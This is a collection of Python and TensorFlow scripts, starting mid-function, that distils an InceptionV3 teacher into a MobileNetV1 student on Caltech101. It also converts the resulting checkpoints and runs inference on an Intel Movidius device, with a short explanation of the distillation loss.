            
            #net = tf.nn.softmax(net/temperature)
            return net


# In[4]:


graph = tf.Graph()
with graph.as_default():
    # INPUTS
    with tf.name_scope("inputs") as scope:
        input_dims = (None, IMG_HEIGHT, IMG_WIDTH, N_CHANNELS)
        tf_X = tf.placeholder(tf.float32, shape=input_dims, name="X")
        
    # PREPROCESSING STEPS
    with tf.name_scope("preprocess") as scope:
        scaled_inputs = tf.div(tf_X, 255., name="rescaled_inputs")

    # Student     
    stu_logits = NetworkStudent(tf_X, scope='student')
    with tf.name_scope("stu_struct"):
        # softmax
        stu_y = tf.nn.softmax(stu_logits/temperature, name="softmax")
        stu_y_actual = tf.nn.softmax(stu_logits, name="actual_softmax")
        
        
    # Separate vars
    model_vars = tf.trainable_variables()
    var_student = [var for var in model_vars if 'student' in var.name]
    
    # parameter 
    total_parameters = 0
    for variable in tf.trainable_variables():
        # shape is an array of tf.Dimension
        shape = variable.get_shape()
        #print(shape)
        #print(len(shape))
        variable_parameters = 1
        for dim in shape:
            #print(dim)
            variable_parameters *= dim.value
        #print(variable_parameters)
        total_parameters += variable_parameters
    print("total params: ",total_parameters)
    
    # STUDENT SAVER
    
    stu_saver = tf.train.Saver(var_student, name="stu_saver")

    # TENSORBOARD - To visualize the architecture
    with tf.variable_scope('tensorboard') as scope:
        tf_summary_writer = tf.summary.FileWriter(TENSORBOARD_DIR, graph=graph)
        tf_dummy_summary = tf.summary.scalar(name="dummy", tensor=1)


# In[5]:


with tf.Session(graph=graph) as sess:
    sess.run(tf.global_variables_initializer())
    sess.run(tf.local_variables_initializer())

        
    stu_saver.restore(sess, STU_SNAPSHOT_FILE)
    stu_saver.save(sess, STU_FLOZEN_FILE)



For prediction on Movidius

import mvnc.mvncapi as mvnc
import numpy as np
from PIL import Image
import cv2
import time, sys, os

import glob

IMAGE_DIR_NAME = '/home/tokunn/caltech101'
if (len(sys.argv) > 1):
    IMAGE_DIR_NAME = sys.argv[1]
#IMAGE_DIR_NAME = 'github_deep_mnist/ncappzoo/data/digit_images'

def predict(input):
    print("Start predicting ...")
    devices = mvnc.EnumerateDevices()
    device = mvnc.Device(devices[0])
    device.OpenDevice()

    # Load graph file data
    with open('./models/graph', 'rb') as f:
        graph_file_buffer = f.read()

    # Initialize a Graph object
    graph = device.AllocateGraph(graph_file_buffer)

    start = time.time()
    for i in range(len(input)):
        # Write the tensor to the input_fifo and queue an inference
        graph.LoadTensor(input[i], None)
        output, userobj = graph.GetResult()
        print(np.argmax(output), end=' ')
    stop = time.time()
    print('')
    print("Time : {0} ({1} images)".format(stop-start, len(input)))

    graph.DeallocateGraph()
    device.CloseDevice()

    return output

if __name__ == '__main__':
    print("Image path : {0}".format(os.path.join(IMAGE_DIR_NAME, '*.jpg or *.png')))
    jpg_list = glob.glob(os.path.join(IMAGE_DIR_NAME, '*.jpg'))
    jpg_list += glob.glob(os.path.join(IMAGE_DIR_NAME, '*.png'))
    if not len(jpg_list):
        print("No image file")
        sys.exit()
    jpg_list.reverse()
    print([i.split('/')[-1] for i in jpg_list][:10])
    img_list = []
    for n in jpg_list:
        image = cv2.imread(n)
        image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
        image = cv2.resize(image, (299, 299))
        img_list.append(image)
    img_list = np.asarray(img_list)# * (1.0/255.0)
    #img_list = np.reshape(img_list, [-1, 784])
    print("imgshape ", img_list.shape)
    predict(img_list.astype(np.float16))

InceptionV3 to MobileNetV1 edition

Parent and child (teacher and student)

#!/usr/bin/env python
# coding: utf-8

# In[1]:


import os,time,glob,sys
#sys.path.append('/home/tokunn/sources/models/research/slim')
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" 
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
import tensorflow as tf
import numpy as np
import tensorflow.contrib.slim as slim
import tensorflow.contrib.slim.nets
import nets.mobilenet_v1
#from __future__ import print_function, division
import loadimg_caltech as loadimg
from tqdm import tqdm
import matplotlib.pyplot as plt

start = time.time()


# In[2]:


np_aryname = './models/data{0}.npy'
    
try: # LOAD
    X_train = np.load(np_aryname.format('X_train'))
    Y_train = np.load(np_aryname.format('Y_train'))
    X_test = np.load(np_aryname.format('X_test'))
    Y_test = np.load(np_aryname.format('Y_test'))
    number_of_classes = np.load(np_aryname.format('number_of_classes')).item()  # np.asscalar is removed in newer NumPy
    
except FileNotFoundError:
    print("### Load from Images ###")
    X_train, Y_train, X_test, Y_test, number_of_classes = loadimg.loadimg(
        '/home/tokunn/caltech101')

    np.save(np_aryname.format('X_train'), X_train)
    np.save(np_aryname.format('Y_train'), Y_train)
    np.save(np_aryname.format('X_test'), X_test)
    np.save(np_aryname.format('Y_test'), Y_test)
    np.save(np_aryname.format('number_of_classes'), number_of_classes)


print("X_train", X_train.shape)
print("Y_train", Y_train.shape)
print("X_test", X_test.shape)
print("Y_test", Y_test.shape)
print("Number of Classes", number_of_classes)


# In[3]:


SNAPSHOT_FILE = "./models/snapshot.ckpt"
#STU_SNAPSHOT_FILE = "./models/student_snapshot.ckpt"
MBNET_SNAPSHOT_FILE = "./models/mbnet_student_snapshot.ckpt"
PRETRAINED_SNAPSHOT_FILE = "./models/inception_v3.ckpt"
PRETRAINED_MOBILENET_FILE = "./models/mobilenet/mobilenet_v1_1.0_224.ckpt"

# somewhere to store the tensorboard files - to visualise the graph
TENSORBOARD_DIR = "logs"
[os.remove(i) for i in glob.glob(os.path.join(TENSORBOARD_DIR, '*.nanase'))]

# IMAGE SETTINGS
IMG_WIDTH, IMG_HEIGHT = [224,224] # Input size of the MobileNetV1 224 checkpoint
N_CHANNELS = 3                    # Number of input channels (RGB)
N_CLASSES = number_of_classes                    # Change N_CLASSES to suit your needs

temperature = 20


# In[4]:


def NetworkStudent2(input,scope='Student', tf_is_training=False, reuse = False):
    #with tf.variable_scope(scope, reuse = reuse) as sc:
    arg_scope = nets.mobilenet_v1.mobilenet_v1_arg_scope()
    with tf.contrib.framework.arg_scope(arg_scope):
        stu2_logits, stu2_end_points = nets.mobilenet_v1.mobilenet_v1(
            input,  # use the function argument instead of the global scaled_inputs
            num_classes=N_CLASSES,
            is_training=tf_is_training)#,
            #depth_multiplier=1.0)
        return stu2_logits, stu2_end_points


# In[5]:


# def NetworkStudent(input,keep_prob_conv,keep_prob_hidden,scope='Student', reuse = False):
#     with tf.variable_scope(scope, reuse = reuse) as sc:
#         with slim.arg_scope([slim.conv2d],
#                             kernel_size = [3,3],
#                             stride = [1,1],
#                             biases_initializer=tf.constant_initializer(0.0),
#                             activation_fn=tf.nn.relu):
                                                      
#             net = slim.conv2d(input, 32, scope='conv1')
#             net = slim.max_pool2d(net,[2, 2], 2, scope='pool1')
#             net = tf.nn.dropout(net, keep_prob_conv)

#             net = slim.conv2d(net, 64,scope='conv2')
#             net = slim.max_pool2d(net,[2, 2], 2, scope='pool2')
#             net = tf.nn.dropout(net, keep_prob_conv)

#             net = slim.conv2d(net, 128,scope='conv3')
#             net = slim.max_pool2d(net,[2, 2], 2, scope='pool3')
#             net = tf.nn.dropout(net, keep_prob_conv)
            
#             net = slim.conv2d(net, 256,scope='conv4')
#             net = slim.max_pool2d(net,[2, 2], 2, scope='pool4')
#             net = tf.nn.dropout(net, keep_prob_conv)
    
#             net = slim.flatten(net)
#         with slim.arg_scope([slim.fully_connected],
#                             biases_initializer=tf.constant_initializer(0.0),
#                             activation_fn=tf.nn.relu) :
            
#             net = slim.fully_connected(net,1000,scope='fc1') # 625
#             net = tf.nn.dropout(net, keep_prob_hidden)
#             net = slim.fully_connected(net,N_CLASSES,activation_fn=None,scope='fc2')
            
#             #net = tf.nn.softmax(net/temperature)
#             return net


# In[6]:


def loss(prediction,output):#,temperature = 1):
    cross_entropy = tf.reduce_mean(-tf.reduce_sum(
        tf.cast(output, tf.float32) * tf.log(tf.clip_by_value(prediction,1e-10,1.0)),
                                                  reduction_indices=[1]))      
    #correct_prediction = tf.equal(tf.argmax(prediction,1), tf.argmax(output,1))
    #accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
    return cross_entropy#,accuracy


# In[7]:


graph = tf.Graph()
with graph.as_default():
    # INPUTS
    with tf.name_scope("inputs") as scope:
        input_dims = (None, IMG_HEIGHT, IMG_WIDTH, N_CHANNELS)
        tf_X = tf.placeholder(tf.float32, shape=input_dims, name="X")
        tf_Y = tf.placeholder(tf.int32, shape=[None, N_CLASSES], name="Y")
        tf_alpha = tf.placeholder_with_default(0.001, shape=None, name="alpha")
        tf_is_training = tf.placeholder_with_default(False, shape=None,
                                                     name="is_training")
        stu_keep_prob_conv = tf.placeholder(tf.float32)
        stu_keep_prob_hidden = tf.placeholder(tf.float32)
        
    # PREPROCESSING STEPS
    with tf.name_scope("preprocess") as scope:
        #scaled_inputs = tf.div(tf_X, 255., name="rescaled_inputs")
        scaled_inputs = tf_X

    # BODY
    arg_scope = tf.contrib.slim.nets.inception.inception_v3_arg_scope()
    with tf.contrib.framework.arg_scope(arg_scope):
        tf_logits, end_points = tf.contrib.slim.nets.inception.inception_v3(
            scaled_inputs,
            num_classes=N_CLASSES,
            is_training=tf_is_training,
            dropout_keep_prob=0.8)
        
    with tf.name_scope("softmax") as scope:
        tch_y = tf.nn.softmax(tf_logits/temperature, name="teacher_softmax")
        tch_y_actual = tf.nn.softmax(tf_logits, name="teacher_softmax_actual")
        
        
    # Student     
#     stu_logits = NetworkStudent(scaled_inputs, stu_keep_prob_conv,
#                                stu_keep_prob_hidden, scope='student')
#     with tf.name_scope("stu_struct"):
#         # softmax
#         stu_y = tf.nn.softmax(stu_logits/temperature, name="softmax")
#         stu_y_actual = tf.nn.softmax(stu_logits, name="actual_softmax")
        
    mbnet_logits, mbnet_end_point = NetworkStudent2(
        scaled_inputs, tf_is_training=tf_is_training, scope='mbnet')
    with tf.name_scope("mbnet_struct"):
        # softmax
        mbnet_y = tf.nn.softmax(mbnet_logits/temperature, name="softmax")
        mbnet_y_actual = tf.nn.softmax(mbnet_logits, name="actual_softmax")
        
        
    # Separate vars
    model_vars = tf.trainable_variables()
    var_teacher = [var for var in model_vars if 'InceptionV3' in var.name]
    #var_student = [var for var in model_vars if 'student' in var.name]
    save_vars = tf.global_variables()
    var_mbnet = [var for var in save_vars if 'MobilenetV1' in var.name]
   

    # PREDICTIONS
    tf_preds = tf.to_int32(tf.argmax(tf_logits, axis=-1), name="preds")

    # LOSS - Sums all losses (even Regularization losses)
    with tf.variable_scope('loss') as scope:
        #unrolled_labels = tf.reshape(tf_Y, (-1,))
        #tf.losses.softmax_cross_entropy(onehot_labels=unrolled_labels,
        
        #tf.losses.softmax_cross_entropy(onehot_labels=tf_Y, logits=tf_logits)
        #tf_loss = tf.losses.get_total_loss()
        
        tf_loss = loss(tch_y_actual, tf_Y)

    # OPTIMIZATION - Also updates batchnorm operations automatically
    with tf.variable_scope('opt') as scope:
        #tf_optimizer = tf.train.AdamOptimizer(tf_alpha, name="optimizer")
        #update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS) # for batchnorm
        #with tf.control_dependencies(update_ops):
        #    tf_train_op = tf_optimizer.minimize(tf_loss, name="train_op")
        
        grad_teacher = tf.gradients(tf_loss, var_teacher)
        tf_trainer = tf.train.AdamOptimizer(tf_alpha, name="optimizer")
        tf_train_step = tf_trainer.apply_gradients(zip(grad_teacher, var_teacher))
            
    # Evaluation
    with tf.variable_scope('eval') as scope:
        y = tf.nn.softmax(tf_logits, name='softmax')
        accuracy = tf.reduce_mean(
            tf.cast(tf.equal(tf.argmax(y, 1), tf.argmax(tf_Y, 1)), tf.float32)
        )
        
    # PRETRAINED SAVER SETTINGS
    # Lists of scopes of weights to include/exclude from pretrained snapshot
    pretrained_include = ["InceptionV3"]
    pretrained_exclude = ["InceptionV3/AuxLogits", "InceptionV3/Logits"]

    # PRETRAINED SAVER - For loading pretrained weights on the first run
    pretrained_vars = tf.contrib.framework.get_variables_to_restore(
        include=pretrained_include,
        exclude=pretrained_exclude)
    tf_pretrained_saver = tf.train.Saver(pretrained_vars, name="pretrained_saver")

    mbnet_pretrained_include = ["MobilenetV1"]
    mbnet_pretrained_exclude = ["MobilenetV1/Predictions", "MobilenetV1/Logits"]
        
    mbnet_pretrained_vars = tf.contrib.framework.get_variables_to_restore(
            include=mbnet_pretrained_include, exclude=mbnet_pretrained_exclude)
    mbnet_pretrained_saver = tf.train.Saver(
        mbnet_pretrained_vars, name="mobilenet_pretrained_saver")
         
    # Student
#     with tf.name_scope("stu_train"):
#         # loss
#         #tf.losses.softmax_cross_entropy(onehot_labels=tf_Y, logits=stu_logits)
#         #stu_loss1 = tf.losses.get_total_loss()
#         stu_loss1 = loss(stu_y_actual, tf_Y)
#         stu_loss2 = tf.reduce_mean(- tf.reduce_sum(tch_y * tf.log(
#             tf.clip_by_value(stu_y, 1e-10,1.0)), reduction_indices=1))
#         stu_loss = 0.4 * stu_loss1 + stu_loss2
#         #stu_loss = stu_loss1
       
#         # optimization
#         grad_student = tf.gradients(stu_loss,var_student)
#         stu_trainer = tf.train.RMSPropOptimizer(learning_rate = 0.0002)
#         #stu_trainer = tf.train.AdamOptimizer(tf_alpha, name="optimizer")
#         #stu_trainer = tf.train.AdadeltaOptimizer()
#         train_step_student = stu_trainer.apply_gradients(zip(grad_student, var_student))
#         #stu_optimizer = tf.train.AdamOptimizer(tf_alpha, name="stu_optimizer")
#         #stu_train_op = tf_optimizer.minimize(stu_loss, name="stu_train_op")
#         # evaluation
#         stu_accuracy = tf.reduce_mean(
#             tf.cast(tf.equal(tf.argmax(stu_y_actual, 1), tf.argmax(tf_Y, 1)), tf.float32)
#         )
        
        
    # Mobilenet V1
    with tf.name_scope("mbnet_train"):
        # loss
        #tf.losses.softmax_cross_entropy(onehot_labels=tf_Y, logits=mbnet_logits)
        #mbnet_loss1 = tf.losses.get_total_loss()
        mbnet_loss1 = loss(mbnet_y_actual, tf_Y)
        mbnet_loss2 = tf.reduce_mean(- tf.reduce_sum(tch_y * tf.log(
            tf.clip_by_value(mbnet_y, 1e-10,1.0)), reduction_indices=1))
        mbnet_loss = 0.4 * mbnet_loss1 + mbnet_loss2
        #mbnet_loss = mbnet_loss1
        
        # optimization
        grad_mbnet = tf.gradients(mbnet_loss,var_mbnet)
        mbnet_trainer = tf.train.RMSPropOptimizer(learning_rate = 0.0002)
        train_step_mbnet = mbnet_trainer.apply_gradients(zip(grad_mbnet, var_mbnet))

        # evaluation
        mbnet_accuracy = tf.reduce_mean(
            tf.cast(tf.equal(
                tf.argmax(mbnet_y_actual, 1), tf.argmax(tf_Y, 1)), tf.float32)
        )

        
    
    # MAIN SAVER - For saving/restoring your complete model
    tf_saver = tf.train.Saver(var_teacher, name="saver")
    
    # STUDENT SAVER
    
    #stu_saver = tf.train.Saver(var_student, name="stu_saver")
    
    mbnet_saver = tf.train.Saver(var_mbnet, name="mbnet_saver")

    # TENSORBOARD - To visualize the architecture
    with tf.variable_scope('tensorboard') as scope:
        tf_summary_writer = tf.summary.FileWriter(TENSORBOARD_DIR, graph=graph)
        tf_dummy_summary = tf.summary.scalar(name="dummy", tensor=1)


# In[8]:


def initialize_vars(session):
    # INITIALIZE VARS
    LOAD_FROM_CHECKPOINT = False
    if LOAD_FROM_CHECKPOINT: #tf.train.checkpoint_exists(SNAPSHOT_FILE):
        print(" Loading from Main Checkpoint")
        session.run(tf.global_variables_initializer())
        tf_saver.restore(session, SNAPSHOT_FILE)
    else:
        print("Initializing from Pretrained Weights")
        session.run(tf.global_variables_initializer())
        tf_pretrained_saver.restore(session, PRETRAINED_SNAPSHOT_FILE)
        mbnet_pretrained_saver.restore(session, PRETRAINED_MOBILENET_FILE)


# In[9]:


with tf.Session(graph=graph) as sess:
    n_epochs = 2
    batch_size = 32 # small batch size so inception v3 can be run on laptops
    steps_per_epoch = len(X_train)//batch_size
    steps_per_epoch_val = len(X_test)//batch_size

    initialize_vars(session=sess)
    
    """
    try:
        print("#### Debuggin Section ####")
        ep2 = sess.run(stu2_end_point, feed_dict = {tf_X: [X_train[0]],
                                              tf_Y: [Y_train[0]],
                                              tf_is_training: True})
        print("EP2 : ", ep2.keys())
        print("shape of logits: ", ep2['Logits'].shape)
        print("shape of prediction: ", ep2['Predictions'].shape)
        #print("pretrained_vars: ", mbnet_pretrained_vars)"""


    print("##### Teacher Training Section #####")
    for epoch in range(n_epochs):
        print("----------------------------------------------", flush=True)
        print("EPOCH {}/{}".format(epoch+1, n_epochs), flush=True, end=' ')
           
        ## TRAINING
        for step in tqdm(range(steps_per_epoch)):
            # EXTRACT A BATCH OF TRAINING DATA
            X_batch = X_train[batch_size*step: batch_size*(step+1)]
            Y_batch = Y_train[batch_size*step: batch_size*(step+1)]

            # RUN ONE TRAINING STEP - feeding batch of data
            feed_dict = {tf_X: X_batch,
                         tf_Y: Y_batch,
                         tf_alpha:0.0001,
                         tf_is_training: True}
            #loss, _ = sess.run([tf_loss, tf_train_op], feed_dict=feed_dict)
            tf_train_step.run(feed_dict=feed_dict)
            
        ## EVALUATE
        val_accuracy = []
        for step in tqdm(range(steps_per_epoch_val)):
            # EXTRACT A BATCH OF TEST DATA
            X_batch = X_test[batch_size*step: batch_size*(step+1)]
            Y_batch = Y_test[batch_size*step: batch_size*(step+1)]
            
            # Evaluation
            feed_dict = {tf_X: X_batch,
                         tf_Y: Y_batch,
                         tf_alpha:0.0001,
                         tf_is_training: False}            
            val_accuracy.append(accuracy.eval(feed_dict=feed_dict))
            
        # PRINT FEEDBACK - once per epoch
        total_val_accuracy = np.average(np.asarray(val_accuracy))
        pre_logits, pre_loss = sess.run([tch_y, tf_loss], feed_dict = {
            tf_X: [X_test[5]],
            tf_Y: [Y_test[5]],
            tf_is_training: False
        })
        print("\tloss: {:0.4f} val accuracy: {:0.4f}".format(pre_loss, total_val_accuracy))
        plt.plot(pre_logits[0])
        plt.show()
       
        # SAVE SNAPSHOT - after each epoch
        tf_saver.save(sess, SNAPSHOT_FILE)
        

    print("### Student Training Section ###")
    n_epochs = 30
    steps_per_epoch = len(X_train)//batch_size // 3 # FOR DEBUG
    steps_per_epoch_val = len(X_test)//batch_size
    print("/////////////////////////////////////////////////////////")
    for epoch in range(n_epochs):
        print("----------------------------------------------", flush=True)
        print("EPOCH {}/{}".format(epoch+1, n_epochs), flush=True, end=' ')
           
        ## TRAINING
        for step in tqdm(range(steps_per_epoch)):
            # EXTRACT A BATCH OF TRAINING DATA
            X_batch = X_train[batch_size*step: batch_size*(step+1)]
            Y_batch = Y_train[batch_size*step: batch_size*(step+1)]

            # RUN ONE TRAINING STEP - feeding batch of data
            feed_dict = {tf_X: X_batch,
                         tf_Y: Y_batch,
                         tf_is_training: True}
            train_step_mbnet.run(feed_dict=feed_dict)
            
        ## EVALUATE
        val_accuracy = []
        for step in tqdm(range(steps_per_epoch_val)):
            # EXTRACT A BATCH OF TEST DATA
            X_batch = X_test[batch_size*step: batch_size*(step+1)]
            Y_batch = Y_test[batch_size*step: batch_size*(step+1)]
            
            # Evaluation
            feed_dict = {tf_X: X_batch,
                         tf_Y: Y_batch,
                         tf_is_training: False}      
            val_accuracy.append(mbnet_accuracy.eval(feed_dict=feed_dict))
            
        # PRINT FEEDBACK - once per epoch
        total_val_accuracy = np.average(np.asarray(val_accuracy))
        pre_logits, pre_loss = sess.run([mbnet_logits, mbnet_loss], feed_dict = {
            tf_X: X_batch,
            tf_Y: Y_batch,
            tf_is_training: False
        })
        print("\tloss: {:0.4f} val accuracy: {:0.4f}".format(pre_loss, total_val_accuracy))
        plt.plot(pre_logits[0])
        plt.show()
        
        mbnet_saver.save(sess, MBNET_SNAPSHOT_FILE) 
    


# In[10]:


end = time.time()
print("Time : {0}".format(end-start))
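
The student objective in the script above combines a hard-label cross-entropy with a soft-target cross-entropy against the teacher's temperature-softened output (`mbnet_loss = 0.4 * mbnet_loss1 + mbnet_loss2`, with `temperature = 20`). Below is a minimal plain-Python sketch of that arithmetic for a single example. The function names and the toy logits are made up for illustration; only the 0.4 weight, the temperature, and the 1e-10 clipping come from the script.

```python
import math

def softmax(logits, temperature=1.0):
    """Softmax of logits / temperature, shifted by the max for numerical stability."""
    scaled = [z / temperature for z in logits]
    m = max(scaled)
    exps = [math.exp(z - m) for z in scaled]
    total = sum(exps)
    return [e / total for e in exps]

def cross_entropy(target, prediction, eps=1e-10):
    """-sum(target * log(prediction)), with prediction clipped to [eps, 1]."""
    return -sum(t * math.log(min(max(p, eps), 1.0))
                for t, p in zip(target, prediction))

def distillation_loss(student_logits, teacher_logits, one_hot_label,
                      temperature=20.0, hard_weight=0.4):
    # Hard term: student's ordinary softmax against the true label
    hard = cross_entropy(one_hot_label, softmax(student_logits))
    # Soft term: student's softened output against the teacher's softened output
    soft = cross_entropy(softmax(teacher_logits, temperature),
                         softmax(student_logits, temperature))
    return hard_weight * hard + soft

# Toy values (hypothetical, three classes)
teacher = [8.0, 2.0, 0.5]
student = [3.0, 1.0, 0.2]
label = [1.0, 0.0, 0.0]
loss_value = distillation_loss(student, teacher, label)
soft_teacher = softmax(teacher, temperature=20.0)
```

Dividing the logits by a large temperature flattens the teacher distribution, so the student also sees how the teacher ranks the wrong classes rather than only the top label.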


For conversion

#!/usr/bin/env python
# coding: utf-8

# In[1]:


import os,time,glob,sys
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" 
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
import tensorflow as tf
import numpy as np
import tensorflow.contrib.slim as slim
import tensorflow.contrib.slim.nets
import nets.mobilenet_v1


# In[2]:


MBNET_SNAPSHOT_FILE = "./models/mbnet_student_snapshot.ckpt"
MBNET_FLOZEN_FILE = "./models/mbnet_flozen.ckpt"

# somewhere to store the tensorboard files - to visualise the graph
TENSORBOARD_DIR = "logs"
[os.remove(i) for i in glob.glob(os.path.join(TENSORBOARD_DIR, '*.nanase'))]

# IMAGE SETTINGS
IMG_WIDTH, IMG_HEIGHT = [224,224] # Input size used for the MobileNet V1 student
N_CHANNELS = 3                    # Number of input channels (RGB)
N_CLASSES = 101                    # Change N_CLASSES to suit your needs

temperature = 20


# In[3]:


def NetworkStudent2(input,scope='Student', tf_is_training=False, reuse = False):
    #with tf.variable_scope(scope, reuse = reuse) as sc:
    arg_scope = nets.mobilenet_v1.mobilenet_v1_arg_scope()
    with tf.contrib.framework.arg_scope(arg_scope):
        stu2_logits, stu2_end_points = nets.mobilenet_v1.mobilenet_v1(
            input,  # use the function argument instead of the global scaled_inputs
            num_classes=N_CLASSES,
            is_training=False)#,
            #depth_multiplier=1.0)
        return stu2_logits, stu2_end_points


# In[4]:


graph = tf.Graph()
with graph.as_default():
    # INPUTS
    with tf.name_scope("inputs") as scope:
        input_dims = (None, IMG_HEIGHT, IMG_WIDTH, N_CHANNELS)
        tf_X = tf.placeholder(tf.float32, shape=input_dims, name="X")
      
    # PREPROCESSING STEPS
    with tf.name_scope("preprocess") as scope:
        #scaled_inputs = tf.div(tf_X, 255., name="rescaled_inputs")
        scaled_inputs = tf_X
        
    # Student             
    mbnet_logits, mbnet_end_point = NetworkStudent2(scaled_inputs, scope='mbnet')
    with tf.name_scope("mbnet_struct"):
        # softmax
        mbnet_y_actual = tf.nn.softmax(mbnet_logits, name="actual_softmax")
        
        
    # Separate vars
    model_vars = tf.trainable_variables()
    var_mbnet = [var for var in model_vars if 'MobilenetV1' in var.name]

    # parameter 
    total_parameters = 0
    for variable in tf.trainable_variables():
        # shape is an array of tf.Dimension
        shape = variable.get_shape()
        #print(shape)
        #print(len(shape))
        variable_parameters = 1
        for dim in shape:
            #print(dim)
            variable_parameters *= dim.value
        #print(variable_parameters)
        total_parameters += variable_parameters
    print("total params: ",total_parameters)
    
    # STUDENT SAVER
    #mbnet_saver = tf.train.Saver(var_mbnet, name="mbnet_saver")
    mbnet_saver = tf.train.Saver(tf.global_variables(), name="mbnet_saver")

    # TENSORBOARD - To visualize the architecture
    with tf.variable_scope('tensorboard') as scope:
        tf_summary_writer = tf.summary.FileWriter(TENSORBOARD_DIR, graph=graph)
        tf_dummy_summary = tf.summary.scalar(name="dummy", tensor=1)


# In[5]:


with tf.Session(graph=graph) as sess:
    sess.run(tf.global_variables_initializer())
    sess.run(tf.local_variables_initializer())
    
    mbnet_saver.restore(sess, MBNET_SNAPSHOT_FILE) 
    #sess.run(tf.initialize_all_variables())
    mbnet_saver.save(sess, MBNET_FLOZEN_FILE)
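
The parameter count printed by the conversion script is the product of each variable's dimensions, summed over all trainable variables. Here is a framework-free sketch of the same arithmetic, using hypothetical shapes rather than the real MobileNet variables:

```python
from math import prod

def count_parameters(shapes):
    """Sum the element counts of every variable shape."""
    return sum(prod(shape) for shape in shapes)

# Hypothetical shapes: a 3x3 conv kernel (3 -> 32 channels), its bias,
# and a dense layer from 1024 features to 101 classes
example_shapes = [(3, 3, 3, 32), (32,), (1024, 101)]
total = count_parameters(example_shapes)
```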

loadimg

#!/usr/bin/env python2

import os
import numpy as np
import tensorflow as tf
from keras.preprocessing.image import load_img, img_to_array
from keras.utils import np_utils
import matplotlib.pyplot as plt
import glob
from sklearn.model_selection import train_test_split


IMGSIZE = 224

def loadimg_one(DIRPATH, NUM):
    x = []
    y = []

    img_list = os.listdir(DIRPATH)
    img_list = sorted(img_list)
    if (NUM) and (len(img_list) > NUM):
        img_list = img_list[:NUM]
    #print("[loadimg] : img_list : ", end=' ')
    #print(img_list)
    
    with open('categories.txt', 'w') as f:
        f.write('\n'.join(img_list))
        f.write('\n')

    img_count = 0

    for number in img_list:
        dirpath = os.path.join(DIRPATH, number)
        dirpic_list = glob.glob(os.path.join(dirpath, '*.jpg'))
        dirpic_list += glob.glob(os.path.join(dirpath, '*.png'))
        for picture in dirpic_list:
            #img = img_to_array(load_img(picture, color_mode = "grayscale", target_size=(IMGSIZE, IMGSIZE)))
            img = img_to_array(load_img(picture, target_size=(IMGSIZE, IMGSIZE)))
            x.append(img)
            y.append(img_count)
            #print("Load {0} : {1}".format(picture, img_count))
        img_count += 1

    output_count = img_count
    x = np.asarray(x)
    x = x.astype('float32')
    x = x/255.0
    y = np.asarray(y, dtype=np.int32)
    y = np_utils.to_categorical(y, output_count)

    return x, y, output_count


def loadimg(COMMONDIR='./', NUM=None):
    print("########## loadimg ########")

    #COMMONDIR = './make_image'
    #TRAINDIR = os.path.join(COMMONDIR, 'train')
    #TESTDIR = os.path.join(COMMONDIR, 'test')
    x, y, class_count = loadimg_one(COMMONDIR, NUM)
    #x_test,  y_test,  _  = loadimg_one(TESTDIR, NUM)
    #for i in range(0, x_test.shape[0]):
    #    plt.imshow(x_test[i])
    #    plt.show()
    #x = np.concatenate((x_train, x_test))
    #x = np.reshape(x, [-1, 784])
    #y = np.concatenate((y_train, y_test)) 

    print("x_train, y_train, x_test, y_test, class_count")
    print("x_train shape : ", x.shape)

    print("########## END of loadimg ########")
    x_train, x_test, y_train, y_test = train_test_split(x, y,train_size=0.8, test_size=0.2)
    return x_train,  y_train, x_test, y_test, class_count

if __name__ == '__main__':
    loadimg()
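
`loadimg_one` labels every image with the index of its class directory (in sorted order) and then expands those indices into one-hot rows with `np_utils.to_categorical`. The sketch below reproduces that labelling in plain Python. The directory names are made up, and `one_hot` is an illustrative stand-in, not the Keras function.

```python
def class_indices(directory_names):
    """Map each class directory to an index, following sorted order."""
    return {name: index for index, name in enumerate(sorted(directory_names))}

def one_hot(index, num_classes):
    """Return a list of zeros with a single 1.0 at position `index`."""
    row = [0.0] * num_classes
    row[index] = 1.0
    return row

dirs = ["panda", "airplanes", "chair"]   # hypothetical class directories
indices = class_indices(dirs)
label = one_hot(indices["chair"], len(dirs))
```

Because `categories.txt` is written from the same sorted list, line `i` of that file is the name of class index `i`.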

Movidius

import mvnc.mvncapi as mvnc
import numpy as np
from PIL import Image
import cv2
import time, sys, os

import glob

IMAGE_DIR_NAME = '/home/tokunn/caltech101'
if (len(sys.argv) > 1):
    IMAGE_DIR_NAME = sys.argv[1]
#IMAGE_DIR_NAME = 'github_deep_mnist/ncappzoo/data/digit_images'

CATEGORIES_FILE = './categories.txt'
with open(CATEGORIES_FILE, 'r') as f:
    categories = f.read().split('\n')

def predict(input):
    print("Start predicting ...")
    devices = mvnc.EnumerateDevices()
    device = mvnc.Device(devices[0])
    device.OpenDevice()

    # Load graph file data
    with open('./models/graph', 'rb') as f:
        graph_file_buffer = f.read()

    # Initialize a Graph object
    graph = device.AllocateGraph(graph_file_buffer)

    predictions = []
    start = time.time()
    for i in range(len(input)):
        # Send one image to the device and wait for its result
        graph.LoadTensor(input[i], None)
        output, userobj = graph.GetResult()
        predictions.append(np.argmax(output))
    stop = time.time()
    
    for i in predictions:
        print(categories[i], end=' ', flush=True)
    print('')
    print("Time : {0} ({1} images)".format(stop-start, len(input)))

    graph.DeallocateGraph()
    device.CloseDevice()

    # Return every predicted class index, not only the last raw output
    return predictions

if __name__ == '__main__':
    print("Image path : {0}".format(os.path.join(IMAGE_DIR_NAME, '*.jpg or *.png')))
    jpg_list = glob.glob(os.path.join(IMAGE_DIR_NAME, '*.jpg'))
    jpg_list += glob.glob(os.path.join(IMAGE_DIR_NAME, '*.png'))
    if not len(jpg_list):
        print("No image file")
        sys.exit()
    jpg_list.reverse()
    print([i.split('/')[-1] for i in jpg_list][:10])
    img_list = []
    for n in jpg_list:
        image = cv2.imread(n)
        image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)  # the network takes 3-channel RGB input, as loaded by loadimg
        image = cv2.resize(image, (224, 224))
        img_list.append(image)
    img_list = np.asarray(img_list) * (1.0/255.0)
    #img_list = np.reshape(img_list, [-1, 784])
    print("imgshape ", img_list.shape)
    predict(img_list.astype(np.float16))
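
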